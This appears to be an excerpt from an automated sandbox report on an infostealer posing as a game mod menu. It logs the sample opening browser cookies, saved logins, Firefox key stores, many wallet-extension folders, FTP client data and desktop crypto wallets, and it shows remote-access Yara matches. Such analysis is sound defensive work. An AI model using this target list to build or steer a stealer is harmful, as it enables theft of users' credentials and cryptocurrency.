                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
                  Source: Yara matchFile source: 00000002.00000003.1274915003.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.1306812533.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.1274752832.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Kiddion's Modest Menu v.1.0.0.exe PID: 7696, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Kiddion's Modest Menu v.1.0.0.exe PID: 7696, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.Kiddion's Modest Menu v.1.0.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Kiddion's Modest Menu v.1.0.0.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1223310292.000000000291D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2391926634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
